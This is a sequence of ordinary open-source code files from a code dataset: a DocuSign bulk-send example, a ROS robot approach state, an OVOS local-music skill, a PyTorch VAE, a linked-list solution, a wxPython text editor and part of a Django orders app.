TextCustomField, CustomFields, Tabs, SignHere\nfrom docusign_esign.models import BulkSendingCopy, BulkSendingList, BulkSendingCopyRecipient, BulkSendingCopyTab, \\\n BulkSendRequest, BulkSendBatchStatus\nfrom flask import request, session\n\nfrom ...consts import demo_docs_path, pattern\nfrom ...docusign import create_api_client\nfrom ...ds_config import DS_CONFIG\n\n\nclass Eg031BulkSendController:\n @staticmethod\n def get_args():\n # More data validation would be a good idea here\n # Strip anything other than the characters listed\n signer_email_1 = pattern.sub(\"\", request.form.get(\"signer_email_1\"))\n signer_name_1 = pattern.sub(\"\", request.form.get(\"signer_name_1\"))\n cc_email_1 = pattern.sub(\"\", request.form.get(\"cc_email_1\"))\n cc_name_1 = pattern.sub(\"\", request.form.get(\"cc_name_1\"))\n signer_email_2 = pattern.sub(\"\", request.form.get(\"signer_email_2\"))\n signer_name_2 = pattern.sub(\"\", request.form.get(\"signer_name_2\"))\n cc_email_2 = pattern.sub(\"\", request.form.get(\"cc_email_2\"))\n cc_name_2 = pattern.sub(\"\", request.form.get(\"cc_name_2\"))\n\n args = {\n \"account_id\": session[\"ds_account_id\"], # Represents your {ACCOUNT_ID}\n \"base_path\": session[\"ds_base_path\"],\n \"access_token\": session[\"ds_access_token\"], # Represents your {ACCESS_TOKEN}\n \"doc_pdf\": path.join(demo_docs_path, DS_CONFIG[\"doc_pdf\"]),\n \"signers\": [\n {\n \"signer_name\": signer_name_1,\n \"signer_email\": signer_email_1,\n \"cc_email\": cc_email_1,\n \"cc_name\": cc_name_1\n },\n {\n \"signer_name\": signer_name_2,\n \"signer_email\": signer_email_2,\n \"cc_email\": cc_email_2,\n \"cc_name\": cc_name_2\n }\n ]\n }\n return args\n\n @classmethod\n def worker(cls, args):\n \"\"\"\n 1. Create an api client and construct API clients\n 2. Create and submit a bulk sending list\n 3. Create a draft envelope\n 4. Add custom fields to the envelope\n 5. Add recipients to the envelope\n 6. Initiate bulk envelope sending\n 7. 
Confirm sending success\n \"\"\"\n\n # Construct your API headers\n #ds-snippet-start:eSign31Step2\n api_client = create_api_client(base_path=args[\"base_path\"], access_token=args[\"access_token\"])\n #ds-snippet-end:eSign31Step2\n\n # Submit a bulk list\n #ds-snippet-start:eSign31Step3\n bulk_envelopes_api = BulkEnvelopesApi(api_client)\n bulk_sending_list = cls.create_bulk_sending_list(args[\"signers\"])\n bulk_list = bulk_envelopes_api.create_bulk_send_list(\n account_id=args[\"account_id\"],\n bulk_sending_list=bulk_sending_list\n )\n bulk_list_id = bulk_list.list_id\n #ds-snippet-end:eSign31Step3\n\n # Create an envelope\n #ds-snippet-start:eSign31Step4\n envelope_api = EnvelopesApi(api_client)\n envelope_definition = cls.make_draft_envelope(args[\"doc_pdf\"])\n envelope = envelope_api.create_envelope(account_id=args[\"account_id\"], envelope_definition=envelope_definition)\n envelope_id = envelope.envelope_id\n #ds-snippet-end:eSign31Step4\n\n # Attach your bulk list id to the envelope\n #ds-snippet-start:eSign31Step5\n text_custom_fields = TextCustomField(name=\"mailingListId\", required=\"false\", show=\"false\", value=bulk_list_id)\n custom_fields = CustomFields(list_custom_fields=[], text_custom_fields=[text_custom_fields])\n envelope_api.create_custom_fields(\n account_id=args[\"account_id\"],\n envelope_id=envelope_id,\n custom_fields=custom_fields\n )\n #ds-snippet-end:eSign31Step5\n\n # Initiate bulk send\n #ds-snippet-start:eSign31Step6\n bulk_send_request = BulkSendRequest(envelope_or_template_id=envelope_id)\n batch = bulk_envelopes_api.create_bulk_send_request(\n account_id=args[\"account_id\"],\n bulk_send_list_id=bulk_list_id,\n bulk_send_request=bulk_send_request\n )\n batch_id = batch.batch_id\n #ds-snippet-end:eSign31Step6\n\n # Confirm successful batch send\n #ds-snippet-start:eSign31Step7\n response = bulk_envelopes_api.get_bulk_send_batch_status(account_id=args[\"account_id\"],\n bulk_send_batch_id=batch_id)\n #ds-snippet-end:eSign31Step7\n print(response)\n\n return response\n\n @classmethod\n def create_bulk_sending_list(cls, args):\n \"\"\"\n 1. Create recipient objects with signers\n 2. Create recipient objects with ccs\n 3. Create bulk copies objects\n 4. 
Create the bulk sending list object\n        \"\"\"\n\n        bulk_copies = []\n        for signer in args:\n            recipient_1 = BulkSendingCopyRecipient(\n                role_name=\"signer\",\n                tabs=[],\n                name=signer[\"signer_name\"],\n                email=signer[\"signer_email\"]\n            )\n\n            recipient_2 = BulkSendingCopyRecipient(\n                role_name=\"cc\",\n                tabs=[],\n                name=signer[\"cc_name\"],\n                email=signer[\"cc_email\"]\n            )\n\n            bulk_copy = BulkSendingCopy(\n                recipients=[recipient_1, recipient_2],\n                custom_fields=[]\n            )\n\n            bulk_copies.append(bulk_copy)\n\n        bulk_sending_list = BulkSendingList(\n            name=\"sample\",\n            bulk_copies=bulk_copies\n        )\n\n        return bulk_sending_list\n    \n    @classmethod\n    def make_draft_envelope(cls, doc_pdf):\n        \"\"\"\n        Creates the envelope\n        \"\"\"\n\n        # Open the example file\n        with open(doc_pdf, \"rb\") as file:\n            content_bytes = file.read()\n        base64_file_content = base64.b64encode(content_bytes).decode(\"ascii\")\n\n        document = Document(\n            document_base64=base64_file_content,\n            name=\"lorem\",\n            file_extension=\"pdf\",\n            document_id=2\n        )\n\n        # Add placeholder tabs\n\n        recipient_sign_here = SignHere(\n            anchor_string=\"/sn1/\",\n            anchor_units=\"pixels\",\n            anchor_y_offset=\"10\",\n            anchor_x_offset=\"20\",\n            tab_label=\"RecipentTab\"\n        )\n\n        # Add placeholder recipients\n        cc = Signer(\n            name=\"Multi Bulk Recipient::cc\",\n            email=\"multiBulkRecipients-cc@docusign.com\",\n            role_name=\"cc\",\n            note=\"\",\n            routing_order=\"2\",\n            status=\"created\",\n            delivery_method=\"email\",\n            recipient_id=\"1\",\n            recipient_type=\"signer\"\n        )\n\n        signer = Signer(\n            name=\"Multi Bulk Recipient::signer\",\n            email=\"multiBulkRecipients-signer@docusign.com\",\n            role_name=\"signer\",\n            note=\"\",\n            routing_order=\"1\",\n            status=\"created\",\n            delivery_method=\"email\",\n            recipient_id=\"2\",\n            recipient_type=\"signer\"\n        )\n\n        signer.tabs = Tabs(sign_here_tabs=[recipient_sign_here])\n\n        envelope_definition = EnvelopeDefinition(\n            email_subject=\"Please Sign\",\n            documents=[document],\n            status=\"created\",\n            envelope_id_stamping=\"true\",\n            recipients={},\n        )\n\n        envelope_definition.recipients = Recipients(signers=[signer], carbon_copies=[cc])\n\n        return envelope_definition\n","repo_name":"docusign/code-examples-python","sub_path":"app/eSignature/examples/eg031_bulk_send.py","file_name":"eg031_bulk_send.py","file_ext":"py","file_size_in_byte":7836,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"82"}
{"seq_id":"36778330480","text":"#!/usr/bin/env python\nimport numpy\nimport rospy\nimport smach\nimport smach_ros\nimport math\nimport tf\nfrom std_msgs.msg import Float32MultiArray, Float64, String\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\n\n###################################################################################\n###################################################################################\n###                                                                             ###\n###    Outcome map:                                                             ###\n###    X = not using    /// - = using                                           ###\n###                                                                             ###\n###    - success = state complete and there are no other objects in the list    ###\n###    X in_progress = state complete but other objects still remain            ###\n###    - no_tf = kinect was not able to find the transform of the objects       ###\n###    - no_objects = no objects were passed to the state                       ###\n###                                                                             ###\n###################################################################################\n###################################################################################\n\n\nclass get_close2(smach.State):\n    #------------------------------------------------------------------------\n    # Variables that only need to be declared once in the state machine\n    def __init__(self, outcomes=['success', 'no_tf', 'no_objects']):\n        smach.State.__init__(self, outcomes=['success', 'no_tf', 'no_objects'], output_keys=['namesids', 'coordX', 'coordY', 'coordZ'], input_keys=['namesids'])\n        self.distance_laser = 0.3 # minimum distance between laser and obstacle\n        self.first_object = []\n        self.max_range = 0.4\n        self.increment = 2 * math.pi / 180 # kinect angle increment (5 degrees in radians)\n        self.kin_pub = rospy.Publisher('/tilt_head/command', Float64, queue_size=1) # publisher for the head servo\n        self.laser = 0\n        self.n = 0 # initial counter value (never change)\n        self.pub_vel = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # publisher to move the base\n        self.vel = Twist()\n        rospy.Subscriber('/scan', LaserScan, self.laser_callback)\n\n#------------------------------------------------------------------------\n# Return the smallest distance detected by the laser\n\n    def laser_callback(self, msg):\n        self.laser = min(msg.ranges[130:180])\n\n#------------------------------------------------------------------------\n# Move the base up to the object, leaving the manipulator positioned to grab the object\n\n    def move_base(self):\n        print(\"no move_base\")\n        self.vel.linear.z = 0\n        #print \"y = \" + str(trans_manip[1])\n        if self.laser >= (self.distance_laser - self.max_range):\n            self.vel.linear.x = 0.1\n            print(\"vel = \" + str(self.vel.linear.x))\n        else:\n            self.vel.linear.x = 0\n            self.vel.linear.y = 0\n            print(\"vel = \" + str(self.vel.linear.x))\n        self.pub_vel.publish(self.vel)\n#------------------------------------------------------------------------\n# Move the base backwards to avoid a collision\n\n    def too_close(self):\n        print(\"no too_close\")\n        print(\"laser = \" + str(self.laser))\n        time = rospy.get_time()\n        while (rospy.get_time() - time <= 1.0):\n            self.vel.linear.x = -0.1\n            self.vel.linear.y = 0\n            self.vel.linear.z = 0\n            self.pub_vel.publish(self.vel)\n        self.vel.linear.x = 0\n        self.pub_vel.publish(self.vel)\n#------------------------------------------------------------------------\n# Move the kinect up or down to find the transform\n\n    def move_kinect(self):\n        print(\"no kinect\")\n        if self.cont < 35:\n            rospy.sleep(0.5)\n            self.j = self.j + 12 * self.increment * self.i / 20\n            print(\"angulo kinect (self.j) = \" + str(self.j))\n            self.kin_pub.publish(self.j)\n            self.cont += 1\n        else:\n            self.cont = 0\n            self.i = -1 * self.i\n#------------------------------------------------------------------------\n# Try to get the transform between object and manipulator\n\n    def tf_check(self):\n        while self.check == False:\n            try:\n                print(\"entrou tf\")\n                print(\"laser = \" + str(self.laser))\n                (self.trans, self.rot) = self.listener.lookupTransform(\"/object_%i\" % self.first_object, \"/manipulator\", rospy.Time(0))\n                self.check = True\n            except tf.Exception:\n                self.move_kinect()\n                self.check = False\n                self.n += 1\n                print(\"n = \" + str(self.n))\n                if self.n == 70:\n                    self.check = True\n#------------------------------------------------------------------------\n# Main code with the variables that need to be reset every time the state is called more than once\n\n    def execute(self, userdata):\n        self.check = False # boolean to check whether the object's tf was found\n        self.cont = 0 # helper to move the kinect angle\n        self.done = False # boolean to check whether the task has finished\n        self.i = -1 # helper to invert the head's direction of movement\n        self.j = 0\n        self.rot = []\n        self.trans = []\n        self.listener = tf.TransformListener()\n        self.kin_pub.publish(0) # start the servo at angle 0\n        #------------------------------------------------------------------------\n        # Ensuring an object is present\n        if userdata.namesids == []:\n            self.first_object = []\n        else:\n            self.first_object = userdata.namesids[0][1]\n#------------------------------------------------------------------------\n# In case the kinect has already hit its limit before\n        if self.n == 70:\n            print(\"resetando\")\n            self.n = 0\n#------------------------------------------------------------------------\n# Main loop\n        while self.done == False:\n            rospy.logwarn('general info')\n            print(\"laser = \" + str(self.laser))\n            print(\"self.distance_laser (padrao) = \" + str(self.distance_laser))\n            rospy.logwarn(\"-\" * 50)\n            #------------------------------------------------------------------------\n            # Approach\n            if (self.laser > self.distance_laser):\n                self.move_base()\n            #------------------------------------------------------------------------\n            # Ideal position\n            elif self.laser >= (self.distance_laser - self.max_range):\n                self.vel.linear.x = 0\n                self.pub_vel.publish(self.vel)\n                #del userdata.namesids[0]\n                if self.first_object == []:\n                    return 'no_objects'\n                else:\n                    self.tf_check()\n                    if self.n == 70:\n                        rospy.loginfo('no tf found')\n                        self.kin_pub.publish(0)\n                        return 'no_tf'\n#                    elif userdata.namesids != []:\n#                        rospy.loginfo('in_progress')\n#                        return 'in_progress'\n                    else:\n                        rospy.logwarn('ending state, success')\n                        print('self.trans =' + str(self.trans) + '\\n')\n                        print(\"coordenadas p/ manipulador:\")\n                        print(\"x' = \" + str(self.trans[0] * 1000))\n                        print(\"y' = \" + str(self.trans[1] * 1000))\n                        print(\"z' = \" + str(self.trans[2] * 1000))\n                        print(\"#\" * 30)\n                        return 'success'\n            #------------------------------------------------------------------------\n            # Avoid collisions\n            elif self.laser < (self.distance_laser - self.max_range):\n                self.too_close()\n\n    #------------------------------------------------------------------------\n\n\n#    def execute2(self,userdata):\n#        try:\n#            execute_main()\n#        except rospy.ROSInterruptException:\n#            pass\n","repo_name":"phdomingues/Robo","sub_path":"get_close2.py","file_name":"get_close2.py","file_ext":"py","file_size_in_byte":8327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"4454085276","text":"from threading import Thread, Event\nfrom typing import List, Optional\nfrom os.path import join, dirname, expanduser, isdir\nfrom random import sample\n\nfrom ovos_plugin_common_play import MediaType, PlaybackType\nfrom ovos_workshop.skills.common_play import OVOSCommonPlaybackSkill, \\\n    ocp_search\nfrom ovos_utils import classproperty\nfrom ovos_utils.log import LOG\nfrom ovos_utils.process_utils import RuntimeRequirements\nfrom ovos_utils.xdg_utils import xdg_cache_home\n\nfrom .util import MusicLibrary, Track\n\n\nclass LocalMusicSkill(OVOSCommonPlaybackSkill):\n    def __init__(self, **kwargs):\n        self.supported_media = [MediaType.MUSIC,\n                                MediaType.AUDIO,\n                                MediaType.GENERIC]\n        self.library_update_event = Event()\n        self._music_library = None\n        self._image_url = join(dirname(__file__), 'ui/music-solid.svg')\n        self._demo_dir = join(expanduser(xdg_cache_home()), \"neon\",\n                              \"demo_music\")\n        OVOSCommonPlaybackSkill.__init__(self, **kwargs)\n\n    @classproperty\n    def runtime_requirements(self):\n        return RuntimeRequirements(network_before_load=False,\n                                   internet_before_load=False,\n                                   gui_before_load=False,\n                                   requires_internet=False,\n                                   
requires_network=False,\n requires_gui=False,\n no_internet_fallback=True,\n no_network_fallback=True,\n no_gui_fallback=True)\n\n @property\n def demo_url(self) -> Optional[str]:\n # default_url = \"https://2222.us/app/files/neon_music/music.zip\"\n return self.settings.get(\"demo_url\")\n\n @property\n def music_dir(self) -> str:\n # default_path = \"/media\"\n return expanduser(self.settings.get('music_dir', \"\"))\n\n @property\n def music_library(self):\n if not self._music_library:\n LOG.info(f\"Initializing music library at: {self.music_dir}\")\n self._music_library = MusicLibrary(self.music_dir,\n self.file_system.path)\n return self._music_library\n\n # TODO: Move to __init__ after ovos-workshop stable release\n def initialize(self):\n # TODO: add intent to update library?\n Thread(target=self.update_library, daemon=True).start()\n\n def update_library(self):\n self.library_update_event.clear()\n if self.music_dir and isdir(self.music_dir):\n LOG.debug(f\"Load configured directory: {self.music_dir}\")\n self.music_library.update_library(self.music_dir)\n user_dir = expanduser(\"~/Music\")\n if isdir(user_dir):\n LOG.debug(f\"Load default directory: {self.music_dir}\")\n self.music_library.update_library(user_dir)\n if self.demo_url and not isdir(self._demo_dir):\n LOG.info(f\"Downloading Demo Music from: {self.demo_url}\")\n self._download_demo_tracks()\n elif isdir(self._demo_dir):\n self.music_library.update_library(self._demo_dir)\n self.library_update_event.set()\n\n @ocp_search()\n def search_music(self, phrase, media_type=MediaType.GENERIC):\n if not self.library_update_event.wait(5):\n LOG.warning(\"Library update in progress; results may be limited\")\n results = self.search_artist(phrase, media_type) + \\\n self.search_album(phrase, media_type) + \\\n self.search_genre(phrase, media_type) + \\\n self.search_track(phrase, media_type)\n if not results and self.voc_match(phrase, 'local.voc'):\n score = 60\n if media_type == MediaType.MUSIC:\n score += 20\n else:\n LOG.debug(\"No media type requested\")\n all_songs = self.music_library.all_songs\n if len(all_songs) > 50:\n all_songs = sample(self.music_library.all_songs, 50)\n results = self._tracks_to_search_results(all_songs, score)\n LOG.debug(f\"Returning all songs with score={score}\")\n LOG.info(f\"Returning {len(results)} results\") # conf 65\n return results\n\n def search_artist(self, phrase, media_type=MediaType.GENERIC) -> List[dict]:\n score = 65\n if media_type == MediaType.MUSIC:\n score += 20\n if self.voc_match(phrase, 'local.voc'):\n score += 20\n tracks = self.music_library.search_songs_for_artist(phrase)\n LOG.debug(f\"Found {len(tracks)} artist results\")\n return self._tracks_to_search_results(tracks, score)\n\n def search_album(self, phrase, media_type=MediaType.GENERIC) -> List[dict]:\n score = 70\n if media_type == MediaType.MUSIC:\n score += 20\n if self.voc_match(phrase, 'local.voc'):\n score += 20\n tracks = self.music_library.search_songs_for_album(phrase)\n LOG.debug(f\"Found {len(tracks)} album results\")\n return self._tracks_to_search_results(tracks, score)\n\n def search_genre(self, phrase, media_type=MediaType.GENERIC) -> List[dict]:\n score = 50\n if media_type == MediaType.MUSIC:\n score += 20\n if self.voc_match(phrase, 'local.voc'):\n score += 20\n tracks = self.music_library.search_songs_for_genre(phrase)\n LOG.debug(f\"Found {len(tracks)} genre results\")\n return self._tracks_to_search_results(tracks, score)\n\n def search_track(self, phrase, media_type=MediaType.GENERIC) -> 
List[dict]:\n score = 75\n if media_type == MediaType.MUSIC:\n score += 20\n if self.voc_match(phrase, 'local.voc'):\n score += 20\n tracks = self.music_library.search_songs_for_track(phrase)\n LOG.debug(f\"Found {len(tracks)} track results\")\n return self._tracks_to_search_results(tracks, score)\n\n def _tracks_to_search_results(self, tracks: List[Track], score: int = 20):\n # TODO: Lower confidence if path is in demo dir\n tracks = [{'media_type': MediaType.MUSIC,\n 'playback': PlaybackType.AUDIO,\n 'image': track.artwork if track.artwork else None,\n 'skill_icon': self._image_url,\n 'uri': track.path,\n 'title': track.title,\n 'artist': track.artist,\n 'length': track.duration_ms,\n 'match_confidence': score} for track in tracks]\n return tracks\n\n def _download_demo_tracks(self):\n from ovos_skill_installer import download_extract_zip\n download_extract_zip(self.demo_url, self._demo_dir)\n self.music_library.update_library(self._demo_dir)\n","repo_name":"NeonGeckoCom/skill-local_music","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6820,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"82"} +{"seq_id":"27958917917","text":"import torch\nimport numpy as np\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nimport re\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision.models.resnet import ResNet, BasicBlock\nfrom torchvision.models.densenet import DenseNet\n# convert data to torch.FloatTensor\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nimport utils\nimport os\n\nclass dVAE_Encoder(nn.Module):\n\n def __init__(self):\n super(dVAE_Encoder, self).__init__()\n self.conv1 = nn.Conv2d(4, 8, 6, stride=1, dilation=1, padding=2)\n self.conv2 = nn.Conv2d(8, 16, 5, stride=2, dilation=2, padding=3)\n self.conv3 = nn.Conv2d(16, 16, 6, stride=1, dilation=2, padding=5)\n self.conv4 = nn.Conv2d(16, 16, 5, stride=3, dilation=2)\n\n self.bn1 = nn.BatchNorm2d(8)\n self.bn2 = nn.BatchNorm2d(16)\n self.bn3 = nn.BatchNorm2d(16)\n self.bn4 = nn.BatchNorm2d(16)\n\n def forward(self, x):\n x = x.float().cuda()\n x = self.conv1(F.leaky_relu(x))\n x = F.pad(x, (1, 0, 1, 0, 0, 0, 0, 0), mode='constant', value=0)\n x = self.bn1(x)\n # print(x.shape)\n x = self.conv2(F.leaky_relu(x))\n x = F.pad(x, (1, 0, 1, 0, 0, 0, 0, 0), mode='constant', value=0)\n x = self.bn2(x)\n # print(x.shape)\n x = self.conv3(F.leaky_relu(x))\n x = self.bn3(x)\n # print(x.shape)\n x = self.conv4(F.leaky_relu(x))\n x = self.bn4(x)\n # print(x.shape)\n # print(\"---------------------------------\")\n # print(x.size())\n return x\n\n\nclass dVAE_Decoder(nn.Module):\n\n def __init__(self):\n super(dVAE_Decoder, self).__init__()\n self.conv1 = nn.ConvTranspose2d(8, 4, 6, stride=1, dilation=1, padding=2)\n self.conv2 = nn.ConvTranspose2d(16, 8, 5, stride=2, dilation=2, padding=3)\n self.conv3 = nn.ConvTranspose2d(16, 16, 6, stride=1, dilation=2, padding=5)\n self.conv4 = nn.ConvTranspose2d(16, 16, 5, stride=3, dilation=2)\n\n self.bn1 = nn.BatchNorm2d(4)\n self.bn2 = nn.BatchNorm2d(8)\n self.bn3 = nn.BatchNorm2d(16)\n self.bn4 = nn.BatchNorm2d(16)\n\n def forward(self, x):\n x = x.float().cuda()\n x = self.conv4(F.leaky_relu(x))\n x = F.pad(x, (3, 3, 3, 3, 0, 0, 0, 0), mode='constant', value=0)\n x = self.bn4(x)\n # print(x.shape)\n x = self.conv3(F.leaky_relu(x))\n x = self.bn3(x)\n # print(x.shape)\n x = self.conv2(F.leaky_relu(x))\n x = F.pad(x, (-1, 
0, -1, 0, 0, 0, 0, 0), mode='constant', value=0)\n x = self.bn2(x)\n # print(x.shape)\n x = self.conv1(F.leaky_relu(x))\n x = F.pad(x, (-1, 0, -1, 0, 0, 0, 0, 0), mode='constant', value=0)\n x = self.bn1(x)\n # print(x.shape)\n # print(x.size())\n return x\n\n\nclass dVAE(nn.Module):\n def __init__(self):\n super(dVAE, self).__init__()\n self.encoder = dVAE_Encoder()\n\n self.conv_mu = nn.Conv2d(16, 16, 3, stride=1, dilation=1)\n self.conv_logvar = nn.Conv2d(16, 16, 3, stride=1, dilation=1)\n\n self.decoder = dVAE_Decoder()\n\n def reparameterize(self, mu, logvar):\n std = torch.exp(0.5 * logvar)\n eps = torch.randn_like(std)\n return mu + eps * std\n\n def forward(self, x):\n x = x.float().cuda()\n latent = self.encoder(x)\n\n mu = self.conv_mu(latent)\n logvar = self.conv_logvar(latent)\n\n z = self.reparameterize(mu, logvar)\n # print(\"----------\")\n # print(z.shape)\n # print(\"----------\")\n answer = self.decoder(z)\n \n return answer, mu, logvar\n\n import torch\n from torch.utils import data\n import random\n from torch.utils.data import dataloader, random_split\n\n","repo_name":"Olbert/VDA_Pytorch","sub_path":"dvae.py","file_name":"dvae.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"24776841681","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:\n dummy = ListNode(next=head)\n startt = dummy\n current = head\n while current:\n unique_flag = True\n while current.next and current.next.val == current.val:\n unique_flag = False\n current = current.next\n \n if unique_flag:\n startt.next = current\n startt = startt.next\n current = current.next\n startt.next = None\n return dummy.next\n","repo_name":"amitchew/competitive-programming","sub_path":"remove-duplicates-from-sorted-list-ii.py","file_name":"remove-duplicates-from-sorted-list-ii.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"38029105247","text":"import wx\nimport menu\n\nclass Textpad(wx.Frame):\n \"\"\"\n Description: Base Frame class for the editor\n \n \"\"\"\n def __init__(self):\n \"\"\"\n Description: Initialize the Frame class\n \"\"\"\n super(Textpad, self).__init__(None, size=(800,400))\n self.dir_name = '.'\n self.file_name = \"New File.txt\"\n self.update_list = []\n self.redo_list = []\n self.max_count = 10\n self.content_saved = True\n self.icon_dir = \"icons/\"\n \n self.status_bar = None\n self.tool_bar = None\n \n self.file_menu = None\n self.edit_menu = None\n self.view_menu = None\n \n # Create the panels for our components to stay\n self.toolbar_panel = wx.Panel(self, -1)\n self.editor_panel = wx.Panel(self, -1)\n \n # call the menu and other component creation functions\n self.create_editor_components()\n self.register_event_callbacks()\n \n # Create the sizer and add our panels into that\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(self.toolbar_panel, 0, flag=wx.EXPAND)\n sizer.Add(self.editor_panel, 1, flag=wx.EXPAND|wx.BOTTOM)\n self.SetSizer(sizer)\n self.SetIcon(wx.Icon(self.icon_dir + 'short_icon.ico', \n wx.BITMAP_TYPE_ICO)\n )\n \n self.Show()\n \n \n\n def create_editor_components(self):\n \"\"\"\n Description: Create all the components(TextArea, Menus,etc...)\n for the editor\n \n 
\"\"\"\n menu.set_menu_bar(self)\n menu.set_tool_bar(self)\n \n # Create a sizer for our editor text area\n hbox = wx.BoxSizer(wx.HORIZONTAL)\n self.control = wx.TextCtrl(self.editor_panel,\n style=wx.TE_MULTILINE|\n wx.TE_NOHIDESEL)\n hbox.Add(self.control, 1, flag=wx.EXPAND)\n \n vbox = wx.BoxSizer(wx.VERTICAL)\n vbox.Add(hbox, 1, flag=wx.EXPAND)\n self.editor_panel.SetSizer(vbox)\n \n self.status_bar = self.CreateStatusBar()\n self.SetTitle(self.file_name)\n \n def register_event_callbacks(self):\n \"\"\"\n Description: Registers the editor component for \n required event callbacks\n \n \"\"\"\n self.control.Bind(wx.EVT_TEXT, self.text_changed)\n self.control.Bind(wx.EVT_LEFT_UP, self.show_status_text)\n self.control.Bind(wx.EVT_KEY_UP, self.show_status_text)\n self.Bind(wx.EVT_CLOSE, self.window_close)\n\n def window_close(self, event):\n \"\"\"\n Description: Window close event handling function\n input_param: event - close Event \n input_type: Event instance\n\n \"\"\"\n \n if event.CanVeto() and not self.content_saved:\n close_dialog = wx.MessageDialog(self, \n \"Do you want to save before closing?\",\n \"Save Check\",\n wx.YES_NO|wx.CANCEL|wx.ICON_QUESTION)\n return_value = close_dialog.ShowModal()\n window_closed = False\n if return_value == wx.ID_YES:\n self.file_menu.save_file(event)\n window_closed = True\n self.Destroy()\n elif return_value == wx.ID_NO:\n window_closed = True\n self.Destroy()\n elif return_value == wx.ID_CANCEL:\n pass\n event.Veto(window_closed)\n else:\n self.Destroy()\n \n def text_changed(self, event):\n \"\"\"\n Description: call back function for text change \n event on the editor\n input_param: event - text change event\n input_type: event - Event instance\n \n \"\"\"\n if not self.content_saved:\n if len(self.update_list) > self.max_count:\n del self.update_list[0]\n else:\n self.SetTitle(self.file_name + \"*\")\n self.content_saved = False\n self.update_list.append(self.control.GetValue())\n\n def SetTitle(self, title):\n \"\"\"\n Description: Sets the Frame's Tile with the give value\n input_param: title - Title string to set on the window\n input_type: title - string\n \n \"\"\"\n super(Textpad, self).SetTitle('TextPad - %s'%title)\n \n def show_status_text(self, event):\n \"\"\"\n Description: Show the text on the status bar if\n it is visible\n input_param: event - menu change event\n input_type: event - Event instance\n \n \"\"\"\n if self.status_bar and self.status_bar.IsShown():\n start_pos, end_pos = self.control.GetSelection()\n col, line = self.control.PositionToXY(end_pos)\n self.status_bar.SetStatusText(\"line no :{0}, col no:{1}\".format(line+1, col+1))\n if event:\n event.Skip()\n\nif __name__ == '__main__':\n app = wx.App()\n frame = Textpad()\n app.MainLoop()\n","repo_name":"Rk85/Textpad","sub_path":"src/Textpad.py","file_name":"Textpad.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"33219869444","text":"from django.http import HttpResponse, JsonResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom .models import *\nfrom cart.models import Category\n\n\n# Create your views here.\ndef index(request):\n context = {\n \"no_of_toppings\": dict(No_of_Topping),\n \"pastas\" : Pastas.objects.all(),\n \"subs\" : Subs.objects.all(),\n \"dinnerplatters\" : DinnerPlatters.objects.all(),\n \"toppings\" : Toppings.objects.all(),\n \"salads\" : Salads.objects.all(), \n \"regular\": 
Regular_Pizza.objects.all(),\n \"sicilian\": Sicilian_Pizza.objects.all(),\n \"extras\": Extra.objects.all(),\n \"sub_items\": Subs_Items.objects.all(),\n \"platter_items\": Platter_Item.objects.all()\n }\n return render(request, \"orders/index.html\", context)\n\n\n#return each menu item based on selection of the user\ndef pasta(request, item_name):\n context = {\n \"item_name\": item_name,\n \"category\": Category.objects.get(menu__menu = \"Pasta\").id,\n \"price\": Pastas.objects.get(pasta = item_name).price\n }\n return render(request, \"orders/items.html\", context)\n \ndef pizza(request, item_name):\n if item_name == \"Regular Pizza\":\n context = {\n \"item_name\": item_name,\n \"category\": Category.objects.get(menu__menu = \"Regular Pizza\").id,\n \"pizza\": True,\n \"price\": Regular_Pizza.objects.get(size = 'Small', topping = 'Cheese').price,\n \"toppings\": Toppings.objects.all()\n }\n return render(request, \"orders/items.html\", context)\n\n else:\n context = {\n \"item_name\": item_name,\n \"category\": Category.objects.get(menu__menu = \"Sicilian Pizza\").id,\n \"pizza\": True,\n \"price\": Sicilian_Pizza.objects.get(size = 'Small', topping = 'Cheese').price,\n \"toppings\": Toppings.objects.all()\n }\n return render(request, \"orders/items.html\", context)\n\n\n\ndef subs(request, item_name):\n try:\n if item_name == 'Extra Cheese on any sub':\n context = {\n \"item_name\": item_name,\n \"price\": Subs.objects.get(subs_items__sub = item_name, size = 'Small').price,\n \"subs\": True,\n \"category\": Category.objects.get(menu__menu = \"Subs\").id,\n }\n else:\n context = {\n \"item_name\": item_name,\n \"price\": Subs.objects.get(subs_items__sub = item_name, size = 'Small').price,\n \"subs\": True,\n \"category\": Category.objects.get(menu__menu = \"Subs\").id,\n \"extras\": Extra.objects.all()\n }\n #if subs with small size do not exists\n except Subs.DoesNotExist:\n context = {\n \"item_name\": item_name,\n \"price\": Subs.objects.get(subs_items__sub = item_name, size = 'Large').price,\n \"subs\": True,\n \"category\":Category.objects.get(menu__menu = \"Subs\").id,\n \"extras\": Extra.objects.all()\n }\n return render(request, \"orders/items.html\", context)\n\n return render(request, \"orders/items.html\", context)\n \ndef salad(request, item_name):\n print(Salads.objects.filter(salad = item_name))\n context = {\n \"item_name\": item_name,\n \"category\": Category.objects.get(menu__menu = \"Salad\").id,\n \"price\": Salads.objects.get(salad = item_name).price\n }\n return render(request, \"orders/items.html\", context)\n\ndef dinnerplatter(request, item_name):\n context = {\n \"item_name\": item_name,\n \"category\": Category.objects.get(menu__menu = \"Dinner Platter\").id,\n \"price\": 